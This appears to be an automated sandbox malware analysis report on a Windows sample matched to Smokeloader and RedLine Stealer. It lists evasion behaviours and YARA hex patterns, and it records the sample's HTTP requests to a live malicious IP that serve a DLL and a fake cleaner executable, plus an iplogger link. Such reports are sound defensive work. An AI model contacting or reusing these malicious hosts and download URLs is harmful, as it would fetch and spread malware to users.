Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1574319
MD5: cfc94b958cba743ed8b273401e37c465
SHA1: 6abb6112d7bcee3f5ca9837ad3f0a0016267fc63
SHA256: 501c477f13b6aef38fa11de85507a55863f99d0cde075879c9c6eab4cf11572f
Tags: exe user-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CFC94B958CBA743ED8B273401E37C465)
    • WerFault.exe (PID: 8072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x10d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: file.exeAvira: detected
Source: http://80.82.65.70/files/download.Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeReversingLabs: Detection: 75%
Source: file.exeReversingLabs: Detection: 44%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeJoe Sandbox ML: detected
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D13817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04D13817
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 07:36:30 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 07:36:32 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: Joe Sandbox ViewIP Address: 80.82.65.70 80.82.65.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000003.2403846656.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.
Source: file.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=Ee
Source: file.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empWD
Source: file.exe, 00000000.00000003.2348586840.0000000005474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyN
Source: file.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127311530.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download.
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download6
Source: file.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download8yb
Source: file.exe, 00000000.00000003.2348586840.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278951429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177695889.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313770429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253670934.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228425864.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127385618.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadA
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadJCZ
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadM5
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadQ5
Source: file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadV
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadc:y
Source: file.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadeep-Al
Source: file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloader:
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadi5c
Source: file.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127311530.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadj
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadm:g
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076612201.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadq:
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloads5
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadt
Source: file.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadvy$
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downe:
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04D1A9C7 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2453211940.00000000057C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2452413532.0000000005FE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2452876649.00000000057A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F4D0FE CreateToolhelp32Snapshot,Module32First,0_2_00F4D0FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7324
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN
Source: C:\Users\user\Desktop\file.exe Command line argument: emp 0_2_00408770
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 0_2_00408770
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe ReversingLabs: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe
Source: file.exe Static file information: File size 1979904 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of dinlulrd is bigger than: 0x100000 < 0x1b1400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dinlulrd:EW;jiwmyjir:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1eb816 should be: 0x1ed637
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: dinlulrd
Source: file.exe Static PE information: section name: jiwmyjir
Source: file.exe Static PE information: section name: .taggant
Source: file.exe Static PE information: section name: dinlulrd entropy: 7.940454687129734
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe
